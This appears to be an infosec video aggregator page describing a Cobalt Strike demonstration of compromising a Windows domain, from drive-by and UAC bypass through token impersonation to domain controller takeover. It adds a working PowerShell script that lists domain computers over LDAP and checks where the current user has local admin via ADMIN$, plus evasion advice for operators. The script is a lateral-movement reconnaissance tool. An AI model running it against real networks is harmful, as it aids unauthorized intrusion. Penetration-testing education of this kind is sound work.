Description: This happy demonstration starts with a web drive-by attack. The drive-by lands us in a medium integrity process on Windows 7. We get past UAC and assume the full administrator rights of the current user. We enumerate hosts on the network--without scanning! We find out that we are a local administrator on another server. We use this trust to get control of that other server. We then find a process running as a domain administrator and impersonate that access token. This allows us to take over the domain controller. This is demolishing Windows Enterprises 101--with a slight twist: we do all of it from Cobalt Strike's "low and slow" Beacon payload over DNS and SMB. Meterpreter makes one short appearance too :) http://www.advancedpentest.com/
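Two of the steps in the description, enumerating hosts "without scanning" and discovering that the current user is a local administrator on another server, map to checks an operator runs from the compromised host's own identity. The following is an added PowerShell example written for this page; it is not code from the video or from Cobalt Strike. It assumes a domain-joined Windows host and that the current user token is the one to test with. It asks Active Directory for computer objects over LDAP (no ping or port sweep) and then opens the ADMIN$ share on each host, which succeeds only for members of that host's local Administrators group.

```powershell
# Added example, not from the video or Cobalt Strike. Assumes a domain-joined
# host; runs as the current user and performs no network scanning.

function Get-DomainComputers {
    # LDAP query via ADSI for every computer object with a DNS host name.
    # The directory already holds the host list, so no sweep is needed.
    $searcher = [adsisearcher]'(&(objectCategory=computer)(dNSHostName=*))'
    $searcher.PageSize = 1000
    $null = $searcher.PropertiesToLoad.Add('dNSHostName')
    $searcher.FindAll() | ForEach-Object {
        [string]$_.Properties['dnshostname'][0]
    }
}

function Test-LocalAdminAccess {
    param([Parameter(Mandatory)][string[]]$ComputerName)
    # ADMIN$ (the remote %SystemRoot%) is only readable by local Administrators,
    # so a successful Test-Path means the current token is an admin there.
    foreach ($name in $ComputerName) {
        $isAdmin = $false
        try {
            $isAdmin = Test-Path -Path "\\$name\ADMIN$" -ErrorAction Stop
        } catch {
            # Access denied, host offline, or name resolution failure: treat as no access.
            $isAdmin = $false
        }
        [pscustomobject]@{ ComputerName = $name; LocalAdmin = $isAdmin }
    }
}

# Usage: list the hosts where the current user already holds local admin rights.
$targets = Get-DomainComputers
Test-LocalAdminAccess -ComputerName $targets | Where-Object { $_.LocalAdmin }
```

Each ADMIN$ probe is an SMB session from the attacker-controlled host to the target, so it produces logon and share-access events there; a "low and slow" operator would rate-limit the loop or restrict it to a short candidate list rather than touching every computer object the directory returns.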
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.